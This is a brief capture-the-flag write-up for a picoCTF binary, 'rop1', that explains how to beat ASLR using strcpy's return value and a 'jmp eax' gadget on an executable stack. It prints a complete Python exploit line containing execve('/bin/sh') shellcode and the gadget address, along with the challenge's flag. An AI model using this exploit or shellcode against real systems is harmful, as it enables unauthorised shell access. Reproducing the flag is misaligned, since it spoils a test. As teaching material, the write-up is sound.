This binary is running on a machine with ASLR! Can you bypass it? The binary can be found at /home/rop1/ on the shell server. The source can be found here.

This question has set the value of ASLR to 1. What this feature does is to randomize the addresses of shared libraries which makes it harder for hackers to exploit the program. But this a very easy one compared to the other questions which have ASLR enabled.

Looking at the source code, we can see that there is a strcpy() function being called. This is a major advantage since the value returned by strcpy() is a pointer to the destination string.

Inspecting the binary, we can see that it has an executable stack.

So all we need to do is find a gadget which can jump to the shellcode which we will give as command line argument.

For finding gadgets, I use rp++ which I find easy to use. You can also try ropeme or any other tools like that.

I found a gadget ‘jmp eax;ret’ which serves my need.

With a little bit of math, we can see that there are 76 bytes that need to be filled before overwriting eip. The shellcode I use is 38 bytes. So we need to fill the rest with junk values (preferrably “A”).

Now using python to do the final touches. python -c ‘print “A”*38+”\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh”+”\x54\x0b\x05\x08″‘

where the last 4 bytes is the address of the gadget I need. Giving that as the command line argument, and you can read flag.txt.

flag: theres_no_need_to_guess

#binary #ASLR #Picoctf